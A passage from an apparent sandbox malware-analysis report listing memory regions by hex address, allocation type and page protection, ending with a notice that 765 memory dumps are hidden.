page read and write
|
||
|
29D4000
|
heap
|
page read and write
|
||
|
95FD000
|
heap
|
page read and write
|
||
|
3353000
|
heap
|
page read and write
|
||
|
960D000
|
heap
|
page read and write
|
||
|
71D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2870000
|
heap
|
page read and write
|
||
|
28CE000
|
heap
|
page read and write
|
||
|
4498000
|
heap
|
page read and write
|
||
|
299B0630000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B940000
|
trusted library allocation
|
page execute and read and write
|
||
|
299B87E2000
|
heap
|
page read and write
|
||
|
4D70000
|
trusted library allocation
|
page read and write
|
||
|
58C1000
|
remote allocation
|
page execute and read and write
|
||
|
4B81000
|
heap
|
page read and write
|
||
|
445F000
|
unkown
|
page read and write
|
||
|
43AC000
|
stack
|
page read and write
|
||
|
4613000
|
heap
|
page read and write
|
||
|
6A40000
|
direct allocation
|
page read and write
|
||
|
691E000
|
stack
|
page read and write
|
||
|
9630000
|
heap
|
page read and write
|
||
|
24C7C000
|
stack
|
page read and write
|
||
|
4591000
|
heap
|
page read and write
|
||
|
4A81000
|
heap
|
page read and write
|
||
|
299A0130000
|
heap
|
page readonly
|
||
|
492E000
|
stack
|
page read and write
|
||
|
25940000
|
heap
|
page read and write
|
||
|
4599000
|
heap
|
page read and write
|
||
|
7CE0000
|
heap
|
page read and write
|
||
|
299B8740000
|
heap
|
page read and write
|
||
|
80F0000
|
trusted library allocation
|
page read and write
|
||
|
459C000
|
heap
|
page read and write
|
||
|
318D000
|
stack
|
page read and write
|
||
|
45B5000
|
heap
|
page read and write
|
||
|
7027000
|
heap
|
page read and write
|
||
|
7FFD9B910000
|
trusted library allocation
|
page execute and read and write
|
||
|
4D80000
|
trusted library allocation
|
page read and write
|
||
|
2D93000
|
heap
|
page read and write
|
||
|
299A11E6000
|
trusted library allocation
|
page read and write
|
||
|
750000
|
heap
|
page read and write
|
||
|
45B5000
|
heap
|
page read and write
|
||
|
45AB000
|
heap
|
page read and write
|
||
|
28C0000
|
heap
|
page read and write
|
||
|
95A2000
|
heap
|
page read and write
|
||
|
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
|
299B8B4D000
|
heap
|
page read and write
|
||
|
247B0000
|
direct allocation
|
page read and write
|
||
|
29B0000
|
heap
|
page read and write
|
||
|
4613000
|
heap
|
page read and write
|
||
|
685E000
|
stack
|
page read and write
|
||
|
299A0D36000
|
trusted library allocation
|
page read and write
|
||
|
4D80000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B75D000
|
trusted library allocation
|
page execute and read and write
|
||
|
3760000
|
remote allocation
|
page execute and read and write
|
||
|
2924000
|
heap
|
page read and write
|
||
|
BD00FF9000
|
stack
|
page read and write
|
||
|
A1D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7DB0000
|
trusted library allocation
|
page read and write
|
||
|
BD00CFF000
|
stack
|
page read and write
|
||
|
299A23ED000
|
trusted library allocation
|
page read and write
|
||
|
2FDE000
|
stack
|
page read and write
|
||
|
299A0210000
|
heap
|
page read and write
|
||
|
4607000
|
heap
|
page read and write
|
||
|
254C1000
|
direct allocation
|
page execute and read and write
|
||
|
45A3000
|
heap
|
page read and write
|
||
|
27C0000
|
heap
|
page readonly
|
||
|
8420000
|
direct allocation
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
4599000
|
heap
|
page read and write
|
||
|
4599000
|
heap
|
page read and write
|
||
|
A40000
|
trusted library allocation
|
page read and write
|
||
|
45AA000
|
heap
|
page read and write
|
||
|
299A239F000
|
trusted library allocation
|
page read and write
|
||
|
4B89000
|
heap
|
page read and write
|
||
|
4B88000
|
heap
|
page read and write
|
||
|
7D6F000
|
stack
|
page read and write
|
||
|
27D0000
|
heap
|
page read and write
|
||
|
301F000
|
stack
|
page read and write
|
||
|
45A3000
|
heap
|
page read and write
|
||
|
A10000
|
trusted library allocation
|
page read and write
|
||
|
459000
|
system
|
page execute and read and write
|
||
|
299A0AB6000
|
trusted library allocation
|
page read and write
|
||
|
2924000
|
heap
|
page read and write
|
||
|
299A0ABF000
|
trusted library allocation
|
page read and write
|
||
|
70C0000
|
heap
|
page execute and read and write
|
||
|
9E0000
|
trusted library section
|
page read and write
|
||
|
2924000
|
heap
|
page read and write
|
There are 765 hidden memdumps, click here to show them.